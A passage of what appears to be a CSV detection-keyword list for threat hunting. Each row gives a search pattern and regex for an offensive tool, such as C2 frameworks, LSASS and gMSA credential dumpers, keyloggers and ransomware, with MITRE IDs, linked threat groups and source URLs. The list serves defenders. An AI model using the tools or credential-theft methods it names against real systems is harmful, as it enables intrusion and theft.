"*github.com/k8gege*",".{0,1000}github\.com\/k8gege.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","1","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","46434" "*github.com/MythicAgents/*",".{0,1000}github\.com\/MythicAgents\/.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","46435" "*github.com/postrequest/link*",".{0,1000}github\.com\/postrequest\/link.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","1","N/A","N/A","10","10","575","90","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z","46436" "*github.com/rasta-mouse/*",".{0,1000}github\.com\/rasta\-mouse\/.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. 
which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","N/A","10","10","761","139","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z","46437" "*github.com/rossja/TinyNuke*",".{0,1000}github\.com\/rossja\/TinyNuke.{0,1000}","offensive_tool_keyword","HVNC","Standalone HVNC Client & Server Coded in C++ (Modified Tinynuke)","T1021.005 - T1071 - T1563.002 - T1219","TA0001 - TA0002 - 
TA0008","N/A","N/A","RMM","https://github.com/Meltedd/HVNC","1","1","N/A","N/A","10","5","445","133","2025-03-27T21:20:10Z","2021-09-03T17:34:44Z","46438" "*github.com/SafeJKA/Kidlogger*",".{0,1000}github\.com\/SafeJKA\/Kidlogger.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","46439" "*github.com/SpiderLabs/*",".{0,1000}github\.com\/SpiderLabs\/.{0,1000}","offensive_tool_keyword","cobaltstrike","SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - 
Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/SpiderLabs/SharpCompile","1","1","N/A","N/A","10","10","291","58","2020-08-07T12:49:36Z","2018-11-01T17:18:52Z","46440" "*github.io/weakpass/generator/*",".{0,1000}github\.io\/weakpass\/generator\/.{0,1000}","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","Black Basta","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","N/A","10","6","541","55","2025-04-08T19:50:48Z","2021-08-29T13:07:37Z","46442" "*GithubC2-main*",".{0,1000}GithubC2\-main.{0,1000}","offensive_tool_keyword","GithubC2","Github as C2","T1095 - T1071.001","TA0011","N/A","N/A","C2","https://github.com/TheD1rkMtr/GithubC2","1","1","N/A","N/A","10","10","136","37","2023-08-02T02:26:05Z","2023-02-15T00:50:59Z","46443" "*gitjdm/dumper2020*",".{0,1000}gitjdm\/dumper2020.{0,1000}","offensive_tool_keyword","dumper2020","Create a minidump of the LSASS process - attempts to neutralize all user-land API hooks before dumping LSASS","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gitjdm/dumper2020","1","1","N/A","N/A","10","1","76","5","2020-12-29T03:55:21Z","2020-10-04T17:25:21Z","46444" "*gitleaks detect*",".{0,1000}gitleaks\sdetect.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","46446" 
"*gitleaks*",".{0,1000}gitleaks.{0,1000}","offensive_tool_keyword","Gitleaks","Gitleaks is a SAST tool for detecting hardcoded secrets like passwords. api keys. and tokens in git repos. Gitleaks aims to be the easy-to-use. all-in-one solution for finding secrets. past or present. in your code.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/zricethezav/gitleaks","1","1","N/A","N/A","N/A","10","19587","1590","2025-04-16T21:10:47Z","2018-01-27T18:19:31Z","46447" "*Git-Scanner*",".{0,1000}Git\-Scanner.{0,1000}","offensive_tool_keyword","Git-Scanner","A tool for bug hunting or pentesting for targeting websites that have open .git repositories available in public","T1213 - T1596 - T1190 - T1590","TA0007 - TA0009 - TA0001","N/A","N/A","Reconnaissance","https://github.com/HightechSec/git-scanner","1","1","N/A","N/A","N/A","4","352","91","2020-06-23T05:44:26Z","2020-05-17T14:30:19Z","46448" "*GIUDA* -askluids*",".{0,1000}GIUDA.{0,1000}\s\-askluids.{0,1000}","offensive_tool_keyword","GIUDA","Ask a TGS on behalf of another user without password","T1558.003 - T1059.003","TA0006 - TA0002","N/A","N/A","Exploitation tool","https://github.com/foxlox/GIUDA","1","0","N/A","N/A","9","5","469","68","2025-03-30T20:42:43Z","2023-07-19T15:37:07Z","46449" "*GIUDA-main.zip*",".{0,1000}GIUDA\-main\.zip.{0,1000}","offensive_tool_keyword","GIUDA","Ask a TGS on behalf of another user without password","T1558.003 - T1059.003","TA0006 - TA0002","N/A","N/A","Exploitation tool","https://github.com/foxlox/GIUDA","1","1","N/A","N/A","9","5","469","68","2025-03-30T20:42:43Z","2023-07-19T15:37:07Z","46450" "*give_dcsync.py*",".{0,1000}give_dcsync\.py.{0,1000}","offensive_tool_keyword","acltoolkit","acltoolkit is an ACL abuse swiss-army knife. 
It implements multiple ACL abuses","T1222.001 - T1222.002 - T1046","TA0007 - TA0040","N/A","N/A","Exploitation tool","https://github.com/zblurx/acltoolkit","1","1","N/A","N/A","N/A","2","120","12","2023-02-03T10:27:45Z","2022-01-12T22:45:49Z","46451" "*glassfish_war_upload_xsrf*",".{0,1000}glassfish_war_upload_xsrf.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","46454" "*glebarez/padre*",".{0,1000}glebarez\/padre.{0,1000}","offensive_tool_keyword","padre","padre is an advanced exploiter for Padding Oracle attacks against CBC mode encryption","T1203 - T1059.003 - T1027.002","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation tool","https://github.com/glebarez/padre","1","1","N/A","N/A","8","3","253","24","2024-05-13T14:28:25Z","2019-12-30T13:52:03Z","46456" "*glit org -*",".{0,1000}glit\sorg\s\-.{0,1000}","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","0","N/A","N/A","8","1","49","7","2024-05-01T15:07:51Z","2022-11-14T11:25:10Z","46457" "*glit repo *",".{0,1000}glit\srepo\s.{0,1000}","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","0","N/A","N/A","8","1","49","7","2024-05-01T15:07:51Z","2022-11-14T11:25:10Z","46458" "*glit user *",".{0,1000}glit\suser\s.{0,1000}","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git
organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","0","N/A","N/A","8","1","49","7","2024-05-01T15:07:51Z","2022-11-14T11:25:10Z","46459" "*glit.exe org*",".{0,1000}glit\.exe\sorg.{0,1000}","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","0","N/A","N/A","8","1","49","7","2024-05-01T15:07:51Z","2022-11-14T11:25:10Z","46460" "*glit.exe repo*",".{0,1000}glit\.exe\srepo.{0,1000}","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","0","N/A","N/A","8","1","49","7","2024-05-01T15:07:51Z","2022-11-14T11:25:10Z","46461" "*glit.exe user*",".{0,1000}glit\.exe\suser.{0,1000}","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","0","N/A","N/A","8","1","49","7","2024-05-01T15:07:51Z","2022-11-14T11:25:10Z","46462" "*glit-i686-pc-windows-msvc*",".{0,1000}glit\-i686\-pc\-windows\-msvc.{0,1000}","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","1","N/A","N/A","8","1","49","7","2024-05-01T15:07:51Z","2022-11-14T11:25:10Z","46463" "*glit-main.zip*",".{0,1000}glit\-main\.zip.{0,1000}","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - 
TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","1","N/A","N/A","8","1","49","7","2024-05-01T15:07:51Z","2022-11-14T11:25:10Z","46464" "*glit-x86_64-apple-darwin*",".{0,1000}glit\-x86_64\-apple\-darwin.{0,1000}","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","1","#linux","N/A","8","1","49","7","2024-05-01T15:07:51Z","2022-11-14T11:25:10Z","46465" "*glit-x86_64-pc-windows-msvc*",".{0,1000}glit\-x86_64\-pc\-windows\-msvc.{0,1000}","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","1","N/A","N/A","8","1","49","7","2024-05-01T15:07:51Z","2022-11-14T11:25:10Z","46466" "*glit-x86_64-unknown-linux-gnu*",".{0,1000}glit\-x86_64\-unknown\-linux\-gnu.{0,1000}","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","1","#linux","N/A","8","1","49","7","2024-05-01T15:07:51Z","2022-11-14T11:25:10Z","46467" "*globaleaks/Tor2web*",".{0,1000}globaleaks\/Tor2web.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","1","N/A","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","46470" "*GlobalUnProtect.exe*",".{0,1000}GlobalUnProtect\.exe.{0,1000}","offensive_tool_keyword","GlobalUnProtect","Decrypt GlobalProtect configuration and cookie files.","T1552 - T1003 - 
T1555","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/rotarydrone/GlobalUnProtect","1","1","N/A","N/A","9","2","147","19","2024-09-10T20:19:24Z","2024-09-04T15:31:52Z","46471" "*gloxec/CrossC2*",".{0,1000}gloxec\/CrossC2.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/gloxec/CrossC2","1","1","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","46472" "*gloxec/CrossC2*",".{0,1000}gloxec\/CrossC2.{0,1000}","offensive_tool_keyword","crossc2","generate CobaltStrike's 
cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","46473" "*GludXhsb2NhbGhvc3Q2LjUuMC1rYWxpMi1hbWQ2NHg4Nc3Q2LjUuMC1rYWxpMi1hbWQ2NHg4Nc3Q2LjUuMC1rYWxpMi1hbWQ2NHg4Nc3Q2LjUuMC1rYWxpMi1hbWQ2NHg4Nl82NDE2MTM0ODExNjQ4NTAxMzg2MDQzMzky*",".{0,1000}GludXhsb2NhbGhvc3Q2LjUuMC1rYWxpMi1hbWQ2NHg4Nc3Q2LjUuMC1rYWxpMi1hbWQ2NHg4Nc3Q2LjUuMC1rYWxpMi1hbWQ2NHg4Nc3Q2LjUuMC1rYWxpMi1hbWQ2NHg4Nl82NDE2MTM0ODExNjQ4NTAxMzg2MDQzMzky.{0,1000}","offensive_tool_keyword","DEDSEC-RANSOMWARE","dedsec ransomware","T1486 - T1489 - T1490 - T1495 - T1488 - T1482","TA0040 - TA0043 - TA0042 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/xelroth/DEDSEC-RANSOMWARE","1","0","N/A","N/A","10","1","7","1","2024-05-17T11:12:23Z","2024-05-17T10:34:03Z","46474" "*GmailC2.csproj*",".{0,1000}GmailC2\.csproj.{0,1000}","offensive_tool_keyword","SharpGmailC2","Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol","T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/reveng007/SharpGmailC2","1","1","N/A","N/A","10","10","260","47","2022-12-27T01:45:46Z","2022-11-10T06:48:15Z","46475" "*gmsa_dump*",".{0,1000}gmsa_dump.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","46476" "*gMSADumper.py*",".{0,1000}gMSADumper\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment 
with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","46477" "*gMSADumper.py*",".{0,1000}gMSADumper\.py.{0,1000}","offensive_tool_keyword","gMSADumper","Lists who can read any gMSA password blobs and parses them if the current user has access.","T1552.001 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/micahvandeusen/gMSADumper","1","1","N/A","N/A","N/A","3","274","51","2024-02-12T02:15:32Z","2021-04-10T00:15:24Z","46478" "*GMSAPasswordReader.exe --*",".{0,1000}GMSAPasswordReader\.exe\s\-\-.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","N/A","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","46479" "*GMSAPasswordReader.exe*",".{0,1000}GMSAPasswordReader\.exe.{0,1000}","offensive_tool_keyword","GMSAPasswordReader","Reads the password blob from a GMSA account using LDAP and parses the values into hashes for re-use.","T1003.004 - T1078.003 - T1059.006","TA0006 - TA0004 - TA0002","N/A","N/A","Credential Access","https://github.com/rvazarkar/GMSAPasswordReader","1","1","N/A","N/A","7","3","219","34","2023-02-17T14:37:40Z","2020-01-19T19:06:20Z","46480" 
"*GMSAPasswordReader.exe*",".{0,1000}GMSAPasswordReader\.exe.{0,1000}","offensive_tool_keyword","GMSAPasswordReader","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","GMSAPasswordReader","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","46481" "*GMSAPasswordReader.exe*",".{0,1000}GMSAPasswordReader\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","GMSAPasswordReader","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","46482" "*GMSAPasswordReader-master*",".{0,1000}GMSAPasswordReader\-master.{0,1000}","offensive_tool_keyword","GMSAPasswordReader","Reads the password blob from a GMSA account using LDAP and parses the values into hashes for re-use.","T1003.004 - T1078.003 - T1059.006","TA0006 - TA0004 - TA0002","N/A","N/A","Credential Access","https://github.com/rvazarkar/GMSAPasswordReader","1","1","N/A","N/A","7","3","219","34","2023-02-17T14:37:40Z","2020-01-19T19:06:20Z","46483" "*GMShellcode*",".{0,1000}GMShellcode.{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - 
TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","10","6","525","82","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z","46484" "*GMShellcode.*",".{0,1000}GMShellcode\..{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","10","6","525","82","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z","46485" "*GMShellcode\*",".{0,1000}GMShellcode\\.{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","10","6","525","82","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z","46486" "*go build cmd/npc/npc.go*",".{0,1000}go\sbuild\scmd\/npc\/npc\.go.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","N/A","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","46488" "*go build cmd/nps/nps.go*",".{0,1000}go\sbuild\scmd\/nps\/nps\.go.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","N/A","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","46489" "*go build Ivy.go*",".{0,1000}go\sbuild\sIvy\.go.{0,1000}","offensive_tool_keyword","ivy","Ivy is 
a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059 - T1204 - T1547","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/optiv/Ivy","1","0","N/A","N/A","10","8","744","129","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z","46490" "*go build lock.go && go build shock.go && go build barrel.go*",".{0,1000}go\sbuild\slock\.go\s\&\&\sgo\sbuild\sshock\.go\s\&\&\sgo\sbuild\sbarrel\.go.{0,1000}","offensive_tool_keyword","TrickDump","Dump lsass using only NTAPIS running 3 programs to create 3 JSON and 1 ZIP file and generate the Minidump later!","T1003.001 - T1027.002 - T1106 - T1212","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/ricardojoserf/TrickDump","1","0","N/A","N/A","10","5","444","50","2025-02-06T20:49:56Z","2024-06-24T12:24:59Z","46491" "*go get -u *traitor/cmd/traitor*",".{0,1000}go\sget\s\-u\s.{0,1000}traitor\/cmd\/traitor.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. 
